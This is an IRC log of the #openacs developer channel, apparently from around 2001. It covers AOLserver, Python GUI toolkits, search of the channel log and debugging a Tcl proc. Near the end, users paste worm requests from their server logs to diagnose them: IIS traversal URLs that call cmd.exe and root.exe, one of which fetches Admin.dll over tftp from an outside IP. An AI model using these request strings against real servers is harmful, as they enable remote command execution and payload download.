00:00:05 i hear he's a smarty pants 00:00:30 talli: well, i guess that depends on what you want out of it, but i've learned alot about aolserver and other stuff from the list, its pretty low traffic.. 00:00:47 i am mostly interested in learning about aolserver 4 00:01:00 unfortunately, it seems you need to be registered to look through the archives 00:01:08 talli: more than that, he's not too condescending about, unlike someother people i know.... 00:01:39 like who? :) 00:02:37 umm... this space is being logged. lets just say, i talked to some people at ad locally and they agree with my op. after the experience of working with him. 00:03:10 hazmat: if you put a # in front of your phrase, it won't get logged 00:03:30 speaking of which ad closed down berekely and don't have an office in la anymore. 00:03:53 I had a friend who worked at the Berkeley office :( 00:04:29 they probably moved him to another office I think. He was the java man 00:05:16 * rbm goes into #mysql to look at what they are saying 00:07:11 heheh 00:09:04 graszew has joined #openacs 00:12:06 i'm actually quite amazed by how poorly functioning slashdot is 00:12:08 oh well 00:13:24 It runs on MySQL. What would you expect? 00:14:05 perl/mysql. not that perl is bad. 00:14:20 but those are usually the ingredients of ugly hacks 00:14:23 Perl can be very bad. 00:14:24 for ugly hacks 00:14:39 You have to force yourself to write reasonably readable code in Perl. 00:14:50 !#$%!(#$! is probably a valid Perl expression 00:15:06 i know people that prefer perl to their wives. 00:15:15 i don't know what i going on in their lives. 00:15:43 The abundance Perl modules is what is awesome. It gives a great deal of power to the language. And CPAN rocks 00:15:55 s/^Perl/of Perl/ 00:16:05 its coming, its coming.... 00:16:25 hazmat: Yeah, how's the Python version of CPAN coming? 00:16:33 have you guys ever checked out activestate? 00:16:48 Which one? 00:16:58 I've installed ActiveTcl and ActivePython in a couple Win boxen 00:17:20 no the web site, its become quite fantastic, thats what i regard as my competition. 00:17:24 not cpan 00:17:37 aspn.activestate.com i think 00:17:43 why is it your competition? 00:17:54 cpan may be cool, but the site is down 00:18:07 that's not so neat 00:18:13 cpan is down? 00:18:14 maybe my net connection just sucks 00:18:15 rbm: its going allright, i just started the openacs version of the data model after archiving the snapshot. 00:18:33 brb 00:18:38 talli has quit 00:18:42 hazmat: ?? What are you talking about? 00:18:44 snapshot of the datamodel prior to the openacs. 00:18:55 i wasn't originally going to use the openacs 00:19:12 so i've started to adapt the datamodel to it. 00:19:27 oh, I see. 00:20:06 I was kind of turned off that activestate is helping M$ to market a solution to move web apps from Linux/UNIX to Win2K 00:20:16 why is AS my competition, long story... outline version, i don't trust them, they're creating a closed source version of a python repository, and they have a vested interset in their own distribution. 00:20:38 of python/perl. etc. 00:20:48 talli has joined #openacs 00:20:51 that said there are a lot of really cool, really smart people their 00:20:55 s/there 00:21:42 which is part of the problem, AS takes the cream of some of the scripting communities and their output is no longer geared toward what could have been of more benefit to the community. 00:22:29 that said the py/perl integration work they did under contract to digital creations (zope people) is incredible and open source as is pyxpcom (the foundation for komodo: mozilla component techonology) 00:22:56 yeah. That's true. 00:23:12 It almost seems like they just want to get the best of open source and make it proprietary 00:23:22 embrace and extend... 00:23:27 yep 00:26:31 hazmat: Let me ask you this, since you know Python better than me.. 00:26:41 hazmat: have you done GUI programming in Python? 00:26:49 yes 00:27:12 I'm looking for something in Python that I can run from within Linux, Win32 and Mac. 00:27:33 I've looked at wxWindow, but it seems that the Mac version of wxPython is not working. 00:27:35 is this a commercial product 00:27:43 tkinter I know that works. 00:27:52 hazmat: commercial yes, but gpl'd 00:28:07 if you can afford qt, get qt 00:28:12 pyqt rocks:) 00:28:12 I'm still on the design stage 00:28:32 Byt Qt only works on Mac OS X. I need it to work on < X 00:29:23 tkinter widgets are ... well their ugly and so basic., of course their also very flexible and mature, lets just say i did one contract with tkinter and i will *never* use it again 00:29:38 oh. why is that? 00:29:54 pygtk is ok, it hides alot of the ugliness of gtk's pointers and casting 00:31:00 * rbm looks at Komodo 00:32:35 tkinter, while it was easy to setup and get going, the lack of some widgets that i take for granted annoyed the heck out of me (can you say file dialog). if its you're cup of tea, go for it... 00:33:02 I thought tk had a file dialog. I'm pretty sure I saw it while playing with TclPro 00:33:12 rbm: thats another possiblity if you dig on xml stuff like xul/rdf and component programming, mozilla is an application framework. 00:33:38 hazmat: So you're suggesting me to use the mozilla gui stuff? 00:34:19 rbm: i know i looked around for one from python, and even had a nice book on python and tkinter (grayson's book is awesome) never found one. 00:35:32 rbm: mozilla is probably way overkill, i'm just tossing it in the ballpark. unless you've got some familiarity with it... it might be hard, oth take a look at some projects at mozdev.org. 00:36:25 hmmm. "Python Cross-Platform COM (PyXPCOM) is ActiveState's bindings between Python and XPCOM, Mozilla's cross-platform component model." 00:37:33 yes, but you can also use javascript 00:37:56 check out mark hammonds slides from osconn @ AS.com 00:38:28 almost all of komodo 90%+ was built in python and xpcom 00:39:14 cool 00:39:25 with a little javascript for xbel bindings and c for some stuff that wasn't exposed to xpcom and some extra work for embedding scintilla, the rest is all xml based stuff rdf/xul/xbel/css 00:40:06 What's the license for Komodo? 00:40:43 Hmmm, I think I found it. 00:40:51 It's proprietary :( 00:41:14 commericial 00:41:49 you can get noncommericial licenses though... 00:42:41 AS occasionally gives out commericial licenses too :) 00:44:11 check out some of the AS talks from osconn if you're interested in mozilla http://www.activestate.com/Corporate/Events/TradeShows/index.html 00:45:08 davb has joined #openacs 00:46:26 hazmat: the catch in the way I need things done is that one non-programmer needs to be able to build some screens for the system 00:46:36 so I'll probably need a GUI builder of sorts 00:51:30 yah, that kind knocks mozilla out of the picture... its a beast of a lizard :) 00:51:54 for pygtk there is guile, for pyqt u can use qt designer (which for qt3.0 is awesome). 00:51:54 heheh 00:52:06 I hear Qt is great. 00:52:19 Have you looked at PythonWorks? 00:52:43 graszew has quit 00:52:58 ugh. everything is in .ppt 00:53:05 yes, know way i could afford it. they (secretlabs.com) do some fairly interesting work in qt. soffice 00:53:13 s/qt/tkinter 00:53:47 but they're also the rewriting it tkinter3000 and i believe they some work on the original bindings... 00:54:00 PythonWorks? I thought it cost like $300. I can't afford it either. It's work who will pay for it 00:54:03 pythonworks is a non standard ide though... it takes a little getting used to 00:54:23 "non-standard" ide? Is there a standard for IDEs? 00:55:34 after a fashion, i think yes. for python work i like wingide.com, but then it also has emacs binding emulation :) 00:59:58 later folks, gotta go 01:00:21 hazmat: Thanks. 01:01:05 rbm: np 01:01:11 hazmat has left #openacs 01:03:36 * rbm goes home 01:29:19 davb has quit 01:59:11 davb has joined #OpenACS 02:03:52 jerryasher has joined #openacs 02:04:21 The RSS 1.0 says: "The only modules that ship "in the box" with RSS 1.0 are Dublin Core" 02:04:33 What does "ship 'in the box'" mean? 02:11:11 heh, good question. 02:11:17 * davb points to AaronSw 02:12:11 I wonder/hope it means that an RSS 1.0 doc can expect the dublin core extension to be understood by all implementations. 02:15:32 Uh, that I doubt. 02:15:48 But I could be wrong. Depends on definition of implementation :) 02:16:28 Well that's why I said wonder/hope as opposed to assume. 02:16:40 right. 02:16:49 jerryasher: have you seen the new OpenFTS search? 02:16:54 for now it's assume, that will let me code a bit more.... 02:17:09 uh, what did you just do and how did you do that? and the answer is no. 02:17:22 Look up Rael Dornfest's articles on Oreillynet.com 02:17:34 did I do something? 02:17:46 Probably your client did something because I mentioned your name? 02:17:52 that was it! 02:17:58 blue screen of death 02:18:02 nah kidding 02:18:05 heh 02:18:19 thats the new virus I named affter you. 02:18:39 interesting, thanks for passing that along then. 02:18:52 I have a screensaver that shows the death screens for all the different OS's. I got a windows screen and said, hey I thought that I was in Linux. 02:18:53 :) 02:18:53 can you give me a link to the article? 02:19:13 ... 02:19:38 I got it now. 02:19:43 oops. crashed mozilla... 02:19:53 I thought maybe he wrote an article about openfts, but you are referring to his rss 1.0 docs 02:19:58 Right. 02:20:40 * jerryasher note to me: start writing articles (ferengi's say they are more profitable 02:20:40 than answering questions on forums...) 02:20:55 Heh. 02:22:28 Why wimpypoint sucks as it is today: I needed some I-880 traffic jam reading material so tried to print out some openacs 4 wimpies 02:22:50 wimpy really needs a "printme" link which puts all the wimpies on one page 02:23:01 That would be cool. 02:23:07 Otherwise it is too time consuming and wasteful of paper to print them out. 02:23:23 jerryasher: you know that saying someting needs to be done on this channel legally binds you to fix it right? 02:23:28 :) 02:23:57 that's fine since you didn't mention any timelines in that legal contract. 02:24:04 I never thought of that. Its the whole, its on the web you;re not supposed to print it out thing. 02:24:50 I print lots of stuff out, and the internet these days is supposed to be about being mobile and 02:24:57 not always having connectivity 02:25:07 nothing more mobile than paper 02:25:11 Right. 02:25:45 http://www.oreillynet.com/images/print.gif 02:25:52 bbl, I am setting up the search again. 02:26:07 hey! where's chump. I even restarted it. This DSL is starting to really suck. 02:26:37 bbl? 02:26:47 chump has joined #openacs 02:26:54 Oops, the (ex?) wife just called, have to talk later.... 02:26:56 bye 02:29:47 chump has quit 02:35:27 toddfx has quit 02:37:13 chump has joined #openacs 02:40:13 chump has quit 02:59:39 talli has quit 03:03:35 argh! 03:10:35 Yippee! 03:11:17 mooo 03:11:20 chumplog searchable with OpenFTS 03:11:23 http://dave.deepskydesign.com/search/search?q=css&t=Search 03:11:27 Hey rbm! 03:11:40 hey davb. That's cool about OpenFTS. How do you like it? 03:11:48 It is amazingly amazing. 03:11:58 I told you it was cool :) 03:12:09 chump has joined #openacs 03:12:34 lots of hits for "rbm" :-) 03:12:35 The only problem is it takes a long time to crank out the results pages. nkd says they are working on that soon. 03:12:54 I bet. and Psychephylax, etc. 03:13:04 uh oh. I have a request error further down the page where I searched for "rbm" 03:13:11 Oops. 03:13:22 Request Error 03:13:22 can't read "offset_next": no such variable 03:13:22 while executing 03:13:22 Hmmm. thought I fixed that. 03:13:22 "append __adp_output 03:13:34 Ok, I am using the unfixed templates. 03:15:06 Ok. its fixed. 03:15:08 thanks. 03:15:39 Now I just have to get it running on the same machine as chump so I don't have to mirror the files. Its running on my desktop/development machine right now. 03:16:37 docwolf has joined #openacs 03:16:40 chump has quit 03:16:44 Too bad, the individual entries aren't indexed. All the summaries are less than informative. 03:16:47 hi docwolf 03:16:59 hi! 03:17:58 It is taking the HTML as the summary instead of the body. 03:18:13 ugh 03:18:49 I wonder if my mime type is screwed up. 03:20:22 h 03:21:41 have fun, try not to crash my server :) 03:24:07 heheh 03:24:27 Your search results page looks like Google's :) 03:25:01 apparenly, thats the default template for search. Not bad huh? 03:26:34 not at all 03:26:46 * rbm looks at thedesignexperience.org 03:27:03 probably not working. THe DSL is very S L O W 03:27:16 Or the server is screwed up. I can't tell. 03:27:54 and I don't feel like driving over to check. But DNS and Mail are fine on the other machine. 03:28:36 chump has joined #openacs 03:28:42 oh he's back. 03:28:44 It came, but very slowl 03:29:09 PHP has some screwed up stuff 03:29:22 yeah. its weird. But my mail is working ok. last time the mail was screwed up. 03:29:29 Worse than Tcl? 03:30:05 I think I am going to bring that machine home and hook it up to the cable and try to get out of that DSL contract. 03:30:11 davb: worse. 03:30:18 * rbm now looks at photographica.org 03:30:21 worse than ASP/VBscript? 03:30:51 I want to upgrade them to OpenACS when I get rich and can donate a server and bandwidth. 03:31:47 The javascript is annoying IMHO 03:32:11 It should close the window when you click back on the main window. (it works in IE) 03:32:23 It screws up the whole screen in Opera. 03:33:01 Must be just that server. the web pages on the 200Mhz mail/DNS machine with 32MB ram are nice and speedy. 03:33:12 So that's why whenever I Alt-Tab it closes the window. 03:33:24 That's even more annoying, since this is not expected behaviour 03:33:55 Some people like it :) 03:35:00 I am really annoyed. I updated to AOLserver 3.3+ad13 and now the server seems to be having alot of problems. Unless it suddenly got very popular... 03:35:04 I could get used to it. Just wasn't expecting it. 03:35:47 Opera is the worst. It changes all the windows. Of course Opera does that will all pop-ups. 03:36:43 definitely a server problem. I can't SSH into it from the box right next to it. 03:38:28 weird. I wonder if its a crappy ethernet card. 03:39:28 huh, now its working a little. very intermittent. 03:39:57 put an intel card there 03:40:00 Pings are 60-70ms. sounds like a software problem. 03:40:09 Well they are 3COM's just old. 03:41:22 $30 for an intel card. 03:41:56 3Com's suck 03:42:14 Really? They sell alot of them. 03:42:23 stay away from 3Coms 03:42:48 Yeah everyone tells me that. Next time I buy one. 03:42:56 Those were all free. 03:43:51 do you know offhand who makes a good athlon mb? 03:44:13 No. I'd love to get my hands on one though. 03:45:15 I am just window shopping to see how much a real server will cost :) 03:46:46 chump has quit 03:47:26 brb. Dexter's Laboratory is on :) 03:47:40 ok 03:48:13 jerryasher has left #openacs 03:49:13 weird, it seems to be getting stuck trying to transfer the css stylesheets. 03:49:43 AaronSw is now known as free_at_last 03:51:11 free_at_last is now known as AaroNSw 03:51:19 AaroNSw is now known as AaronSw 03:54:12 http://dave.deepskydesign.com/search/search?q=aaronsw&t=Search 03:54:20 Chump-log search for AaronSw 03:54:24 uh oh 03:55:56 If you're going to imitate Google, It'd be better if you highlighted relevant parts like Google does. 03:56:23 It does. But I think I screwed something up. 03:56:46 and I am too tired to fiddle with it. 03:57:59 Ooh, I love the link to: http://dave.deepskydesign.com/search/url_next@ 03:58:01 heh heh heh 03:58:13 oops. 03:59:24 I'll have to look at the summary code. Yesterday on some other static pages I tried it worked nicely. The HTML from the chump looks ok. 03:59:31 Hmm. 04:00:27 actually its not. 04:00:34 at least not according to the validator. 04:01:23 Isn't it coming from XSLT? 04:01:36 yes. 04:02:05 anyway. it might be confused because the is not first. 04:02:10 or not. I have no idea :) 04:13:18 acutally I think its grabbing the first 200 chars, which is always the same on those pages. 04:13:35 right 04:14:02 I though maybe it was actually getting the content where the search terms were found. But that would be TOO col. 04:14:06 cool. 04:14:57 Eventually I wanted to stuff the links all in the database. Then each item would be searchable seperately. 04:21:30 chump has joined #openacs 04:22:47 I am checking out photo-album. I hope it works. 04:23:08 I use photo-album-lite 04:23:46 Cool? Oracle? 04:24:31 chump has quit 04:24:51 I checked out both. Perhaps I will try them out tomorrow. I got a digital camera and took almost 200 pictures so far. 04:33:38 Yeah, Oracle :-( 04:33:45 anybody ported it to pg yet for me? 04:34:32 its in progress I think. Photo-album is a million times better interface than photodb. 04:34:55 Hmm, perhaps I should use Lars' his rocks 04:35:10 Is it available? 04:35:26 I dunno... email him, I gues 04:35:33 heh? 04:35:51 There should be a photo attachement system for ETP soon. 04:36:14 Luke keeps adding all these new features, so I keep putting off upgrading my site. 04:36:56 OK. I need an interface to upload all the photos in a folder. Why hasn't anyone thought of that. I guess its a DOS issue. 04:37:17 OF course I can just insert them with a script in psql. 04:37:57 hmmm. photo-album seems pretty light itself. 04:38:13 Al it has is add a folder, add an ablum, stick photos in your album. 04:38:19 davb, I coded the upload myself. 04:38:31 Maybe it's the same as photo-album-lite? 04:38:34 Heh, of course. 04:38:45 I got so annoyed with the file upload I just scped it 04:38:51 Yeah maybe. I wonder why there are two packages. 04:39:07 So you can just load them in from a directory on the server? good idea. 04:40:27 yep 04:40:39 But for some reason it doesn't seem to grab the originals... I need to fix that 04:40:54 ugh, i'm so tired of coding tcl so i keep putting all this stuff off 04:41:40 Tcl is not the prettiest langauage. I want to try Ruby one of these days. Someone has ns_ruby around somewhere. 04:42:46 Aha. Photo-album lite is a little simpler than photo-album. Its supposed to be super easy. 04:43:03 Upload from my server to itself is not working... 04:43:52 Perhaps it's not Tcl I don't like but remote editing of code. 04:44:09 Oh. 04:44:23 emacs over slow connection in small window sucks 04:44:26 Aha. 04:44:34 and tcl just makes it worse, i guess 04:44:41 I have fast internet at both ends. 04:44:46 I can see that. 04:44:54 Who will convert my site to PostgreSQL for me? 04:45:00 :-) 04:45:02 Uh.... 04:45:11 yeah. How much pl/sql does it use? 04:45:36 I haven't written any 04:45:42 Well thats good. 04:45:52 It'd just be ACS3 stuff and photo-album-lite 04:45:59 that has pl/sql 04:46:08 Oh. 04:46:13 Well get to work! 04:46:28 How much of ACS3 has been ported? 04:46:38 I am just scrapping my old site and starting over. I may or may not transfer over my weblog? 04:46:41 3.? 04:46:57 err, sorry I mean 4 04:47:06 why do I keep saying 3... 04:47:11 Oh, most of it I suspect. 04:47:15 It's 4.1 + some CVS gunk 04:47:38 There have been alot of fixes. I am not sure how much datamodel has changed. 04:48:08 I'm so lazy, though... 04:48:12 Most of the pacakges have been worked on. 04:48:21 I really only use news, I guess. 04:48:31 Well you could always rewrite it in Python :) 04:48:38 Which site? 04:48:53 blogspace.com and logicerror.com 04:48:59 Ok. 04:49:26 Is there alot of custom code? 04:49:48 Not really... just all of Blogspace, and some small stuff that really isn't used anymore 04:50:00 I hate sitting and being slow because I use Oracle 04:50:06 Ok. just curious. 04:50:09 but I also hate wasting time fighting with porting stuff 04:50:22 and SQL makes me feel so icky these days 04:50:23 04:50:27 Well NOW i think I kinda have the hand of it. 04:50:42 And most of the work has been done, the ACS stuff anyway. 04:50:48 Well that's good. 04:51:05 I think we are going beta real soon now. 04:51:10 Great! 04:51:24 I could get laid off like Lars and do it, but that seems unlikely since i don't have a job ;) 04:51:34 Yeah. that is tricky. 04:51:50 Maybe Lars and Markd2 can do it. 04:52:27 Heh. 04:52:36 I keep thinking of Metallica every time you say lars....its late... 04:52:55 Heheheh! 04:53:06 I wonder what my website would look like if _he_ ported it. 04:53:47 docwolf dropped in a URL to a little flash movie with metallica in it... I can't find it in the search though. 04:54:24 Oh, the one where they say NAPSTER IS EVIL! and that stuff 04:54:27 ? 04:54:40 yeah! 04:55:13 hmmmm. that day seems to have not been indexed. 04:55:49 Also photo-album lite doesn;t use the CR. (right?) 04:56:02 I don't think so... 04:56:13 Thats the other difference apparently. 04:56:25 Ah, that'd explain the "lite" ;) 04:56:43 Maybe I'd be better off if I just moved everything to Zope... 04:56:51 * AaronSw ducks 04:56:59 heh. Go for it! 04:57:18 Then I have an Access/ASP project for you! 04:57:18 I'm supposed to be learning Zope... hmmph 04:57:22 Aaah! 04:57:25 * AaronSw runs 04:57:40 * rbm is back 04:57:45 Zope is interesting. 04:57:49 *pant* *pant* hmm, can't run very far on IRC. 04:57:54 WOW! Was that the dexter marathon? 04:57:58 :) 04:58:44 It probably would be good to learn it so that OpenACS can steal^H^H^H^H^Hadopt all the good ideas from it. 04:58:53 Heh. 04:59:03 davb: No :) But there's 3 hours of Dexter's Lab saturday ;-) 04:59:10 Cool. 04:59:14 * davb needs to get a Tivo 04:59:19 You guys need to rename to something like Sope, or Dope. 04:59:20 I went for an ice cream for a change 04:59:26 Ooh, tivo. 04:59:27 Javuh 04:59:35 Excellent. 04:59:35 My tivo has a Tcl webserver, but not OpenACS. 04:59:40 Nifty. 05:00:09 I was like, who programmed this? They used all my favorite stuff: Tcl, HTTP, bash, etc. 05:00:28 email him :) 05:00:49 Oh yeah. acs-service-contract is the coolest thing ever. Go study it now! 05:00:54 oh? 05:01:15 Anyway it is to me. I have no programming experience, so the evolution of OpenACS is very educational. 05:01:26 Heh... 05:01:32 I don't know what other systems use, but its very neat. 05:01:51 It might be related to Zope's New Religion (TM): Interfaces. 05:02:01 Also the OpenACS templating system is really nice. 05:02:07 Yeah, probably. 05:02:44 "Most component systems are based on the use of interfaces. Interfaces 05:02:44 allow components to create contracts which define their functional 05:02:44 level of reuse and customization. It also provides the infrastructure 05:02:44 for runtime discovery of which implemented interfaces are available." 05:05:08 That sounds like a UMLOOPY worshipping system 05:05:28 UMLOOPY? 05:05:46 UMLOOPY is the OO god we came with for my CS 5700 class (OO Software Development) 05:05:53 Hehheh 05:05:57 He worshipps the OO gods, of which UMLOOPY is the biggest one 05:06:05 Notice the "UML" 05:06:09 Ah. 05:06:15 And Py? 05:06:25 Interfaces seemed stupid to me, I was like why not just look at the code itself if you want to know what it does? 05:06:26 We needed a cool suffix :) 05:07:39 * AaronSw thinks of ways to procrastinate... 05:07:48 Easy. Log on to IRC :) 05:07:55 no kiddin 05:07:58 I must be going, its after midnight here. 05:07:59 s/$/g/ 05:08:15 heh, c'ya 05:08:30 I will be back tomorrow to code some more! 05:08:40 davb has quit 05:19:39 loggy has joined #openacs 05:19:39 Users on #openacs: loggy docwolf rbm Psychephylax shagster blueseed AaronSw 05:19:39 This channel is logged: http://www.blogspace.com/openacs/chatlogs/ and blogged: http://www.thedesignexperience.org/openacs/ircblog 05:39:05 hazmat has joined #openacs 06:21:56 wb hazmat 06:22:05 hallo 06:22:22 been posting to the bboards... 06:22:59 * rbm checks his mail 06:24:11 here's a nice quote - my relational skills are so weak that i hesistate to suggest in front of such an august crowd 06:24:26 jerryasher has joined #openacs 06:24:42 hi jerry 06:24:50 hi kapil 06:26:23 my warm cloak of anonymity has unravled around here, or think i took it off when i came in the room. 06:26:47 I apologize. All these nick are too much for me. 06:26:53 "he long awaited version 4.0 of the 06:26:54 MySQL database is now available for 06:26:54 download at the MySQL website. The 06:26:54 new version is intended as a platform 06:26:54 for building mission critical, heavy load 06:26:54 database solutions" 06:26:59 Why don't they say that this is an alpha release? 06:27:02 Sides which, Dershowitz says you have a right to privacy, not to anonymity 06:28:49 i remember seeing a packed mysql session at osconn, how to recover from a f*cked db... 06:29:54 oh.. it wasn't that bad it was called MySQL Crash Recovery 06:32:18 What's sad though, is that MySQL AB is the Microsoft of open source databases. Crappy product, great marketing, lots of dishonesty. 06:33:24 i think mysql is a great tool for a lot of things, i just don't know that i would call it an rdbms. 06:34:39 It doesn't matter what it's good for. Their marketing machine (/. included) keeps touting it as a "mission critical database system" and millions of idiots buy into it, much like M$ users. 06:35:38 In contrast, the PG team, not worrying about their marketing... 06:35:40 i was talking to some guys at city search, their whole system is apache running mod_perl with template_tk querying oracle, the kicker was they were using mysql as in memory relational like cache. 06:36:53 rbm: i think that has much to do with the project histories, projects which are heavily company backed or founded tend to have a certain degree of marketing around them, i think its the nature of business, i don't fault the product for it, as long as the community itself knows the value of the product. 06:38:03 I fault MySQL implementors for blatantly lying about the capabilities of their product, and for misleading users. 06:39:07 aye, that is irreprehensible... 06:41:28 * hazmat uses big words he doesn't know. 06:42:10 Their "crash me" 'benchmarks' are some of the most misleading and erroneous I've seen in the entire industry. 06:42:33 rbm: i'm curious what you though about my post re an event-channel for openacs? 06:42:51 the concept in general that is. 06:43:04 Psychephylax has quit 06:43:56 hazmat: I don't see it. 06:44:05 oh. got it 06:44:36 smoke break 06:44:45 hazmat: I'm not familiar with the issue 06:45:47 I think he means he's going to go outside for a cigarette. 06:50:53 And stop calling me Shirley 06:51:21 Only 56 shopping days.... 06:53:56 Jon_H has joined #openacs 06:54:05 hi jon 06:54:17 hi all 06:55:37 is there any wierd things i should know about defining custom proc 's in the /tcl directory? i can only get the fist on in the file to load. 06:55:53 1st one i ment 06:56:48 Turn debug on and look in the server log. I wonder if you have a syntax error causing AOLserver to barf. 06:57:38 all its says is that its an ivailid command name 06:58:42 syatax is fine. but the first time i registered them they wern't, does aolserver hold them somwhere other than system memory 06:58:52 You definitely have a syntax error. Why is hard to determine. Make sure that you 06:59:04 im typng with one hand here excuse my typos 06:59:24 have all your quotes, squotes, brackets, squirrely brackets balanced 06:59:40 Uh, hey, take that shit to some AOL chatroom 07:00:00 its only proc idw_menu {} { return "" } 07:00:13 ok. 07:00:33 that proc looks fine. 07:00:52 i know 07:01:06 i keep searching thx 07:01:11 how did you reload the file? 07:01:18 did you stop/start the server or? 07:01:21 restarted the server 07:01:35 it doesn't hold them anywhere other than system memory 07:02:03 the file order matters 07:02:06 arrgg 07:02:09 that might be it 07:02:17 brb 07:02:33 Is there a way to regenerate the available file? 07:02:35 oops 07:04:22 no that didn't help 07:11:39 what's the error on the log? 07:17:49 idware has joined #openacs 07:18:06 Jon_H has left #openacs 07:18:16 idware is now known as jon_h 07:18:40 thats better 07:18:51 rbm: ill paste it 3 lines 07:18:55 [-conn0-] Error: invalid command name "idw_side_menu" 07:18:55 invalid command name "idw_side_menu" 07:18:55 while executing 07:18:55 "idw_side_menu" 07:18:55 invoked from within 07:18:55 "append page_content "
[idw_side_menu] 07:19:42 is this in a page or in a tcl lib? 07:19:53 and where is idw_side_menu defined? 07:20:00 tcl lib 07:20:04 cause your tcl interp can't find it. 07:20:17 is it at the top level of a tcl lib file? 07:20:24 in a tcl file in the /tcl dir 07:20:27 that doesn't make too much sense. 07:20:57 what is the full pathname of the file containing: "append page_content "
/home/aol130/servers/openacs-3.2.5/www/pvt/home.tcl 07:21:48 Right, so THAT file is a "page" in your webroot. 07:22:01 yes 07:22:09 Now earlier you told me the proc name was idw_menu, not idw_side_menu. 07:22:20 Is the .tcl file where your proc is defined loaded at startup? It should show in the logs 07:22:25 that was an eg. 07:22:33 the names are corrtect 07:22:34 What is the full pathname of the file containing idw_side_menu? 07:22:50 /home/aol130/servers/openacs-3.2.5/tcl 07:23:52 i had 3 proc's in that file all similar (different name) the 1st one onlt loaded 07:23:58 Is that a file name? 07:24:05 that's a dir name, not a file name. 07:24:32 no file name idw-cust.tcl 07:24:43 as rbm asked earlier, in your logs, does it show idw-cust.tcl being loaded at startup? 07:25:09 it did before let me kcheckagin 07:25:29 * rbm hugs Debian 07:25:51 You're apt to get a disease if you do that too much. 07:26:03 why? 07:26:13 I dunno, just trying to be punny 07:26:16 heh 07:26:46 thats it 07:26:48 no value given for parameter "body" to "proc_doc" 07:26:49 while executing 07:26:49 "proc_doc idw_side_menu {} { 07:26:49 return "
Menu
(file "/home/aol130/servers/openacs-3.2.5/tcl/idw-cust2.tcl" line 1) 07:27:05 oh. well you should fix that then. 07:27:20 cheers 07:27:45 Yes indeed. Cheers, then Quantum Leap. g'night. 07:28:03 jon_h has left #openacs 07:29:42 wtem has joined #openacs 07:29:55 any freebsd nerds in the house? 07:30:48 not me 07:34:35 alright... i'll see if there is a #freebsd channel... 07:34:39 goodnight 07:39:59 wtem has quit 07:48:33 shagster has quit 08:11:26 hazmat has quit 08:17:14 jerryasher has quit 09:02:33 docwolf has quit 09:04:07 docwolf has joined #openacs 09:15:49 djg has joined #openacs 09:16:05 djg has quit 09:45:42 shagster has joined #openacs 12:14:27 davb has joined #OpenACS 12:29:41 AHA! 12:30:00 Code red? GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2066.24.25.187%20GET%20Admin.dll%20e:\Admin.dll 12:30:41 * davb goes to find that code red go away stuff... 12:33:17 or nimba? 12:42:49 shagster has quit 13:06:16 Psychephylax has joined #openacs 13:07:05 :/ 13:07:19 Hey! 13:07:30 ¿yeH 13:07:32 I am getting slammed with a worm on my webserver :< 13:07:37 we all are 13:07:51 node10.net6.fundy.net - - [30/Oct/2001:02:24:39 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-" 13:07:51 node10.net6.fundy.net - - [30/Oct/2001:02:24:39 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-" 13:07:51 node10.net6.fundy.net - - [30/Oct/2001:02:24:39 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285 "-" "-" 13:07:54 node10.net6.fundy.net - - [30/Oct/2001:02:24:39 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285 "-" "-" 13:07:57 .... 13:08:04 yeah 13:08:10 Ignore it :) 13:08:11 Oh. 13:08:13 unless you run IS 13:08:18 s/IS/ISS 13:08:21 Yeah except it's killing my machine. 13:08:22 AAAAA!!!! 13:08:27 IIS? 13:08:30 :) 13:08:35 yeah that's it 13:08:44 How is it killing your machine 13:08:53 My p200 doesn't seem to mind :/ 13:09:15 Really? I am running AOLserver/ACS and its getting hammered. It hits the database every time. 13:09:28 hah 13:09:47 Your front page has db access doesn't it 13:09:52 a million 404s wouldn't do that. 13:10:00 without the database. 13:12:47 Psychephylax has quit 13:13:03 Psychephylax has joined #openacs 13:13:48 Bah 13:14:15 hmmm. still sucking. 13:14:27 did you get my messages before i got booted? 13:14:56 Your front page has db access doesn't it was the last one 13:15:06 Well, you just ran into a site design bug :) 13:15:11 You could either add an intro page that has no db access 13:15:16 or you could probably see if you can add a redirect into the RP so it serves up a 404 before it does db access if people request that specific URL 13:15:45 I added something in, but its not working... 13:16:10 what did you add? 13:16:40 a filter that runs before everything else to stall the threads... 13:16:50 why don't you try this 13:17:26 * Psychephylax calls upon his Tcl gods at 8:15 in the morning to muster up a RE to search for /scripts/ in the request path 13:17:39 You don't have anything on your site that starts with /scripts/ do you 13:17:44 no. 13:17:47 ok 13:17:49 then do this 13:17:51 No i have that. i just do /scripts/* 13:18:01 and you do what? 13:18:30 not sure... I copied it from someone else :) 13:18:36 heh 13:18:54 Are you doing this in the AOLServer config or in your front page? 13:19:12 AOLserver. 13:19:25 in the *.tcl startup script? 13:19:50 Yeah. Its in init.tcl which runs during the server startup before the ACS stuff loads. 13:19:59 hmmm 13:20:12 that should work 13:20:18 but try doing this too: 13:20:24 in your index.adp 13:20:48 ack. the permissions are hosed... hang on. 13:21:43 first spot you can try adding is a regular expression to match the URL (I've seen REs to parse URLs) and grab scripts out of it 13:22:35 then, the next line just do an if $in_url == 'scripts' ns_returnredirect /worm.adp (with no db access) 13:22:42 that should work 13:23:19 Don't even need that. 13:23:28 ? 13:23:32 It has to be a filter before any other runs. 13:23:43 Otherwise the RP gets it and hits the database. 13:23:59 hmmm 13:24:00 Well its not relly a RP in OpenACS 3, but it hits the db anyway. 13:25:03 how come init.tcl isn't working? 13:25:06 argh! 13:25:28 i don't know. whenever I start up the server, I can't get in because its overloaded so I can't read the log :) 13:25:37 rofl 13:25:54 are you on the lan with the computer? 13:25:59 firewall off port 80 13:26:03 I am glad I didn't figure this out last night, I would have been up all night 13:26:07 Oh heh... 13:26:10 right. 13:26:23 :-/ 13:26:31 No I am 7 miles away, but I can adjust the firewall running on that machine. 13:26:39 ok 13:26:41 if I ever ssh back in... 13:26:46 lol 13:27:21 The best way is to go to the machine and unplug the network connection first... 13:27:23 how are you getting hammered I got like 5 requests 13:27:29 yeah I was just thinking that :) 13:27:35 My log is full. 13:27:52 Or something else is screwed and its just a coincidence... 13:28:00 i have 5 entries in my log for today 13:28:16 If I ever get back in, I'll check my log :( 13:29:57 My p200 with 32mb ram running a couple of little sites 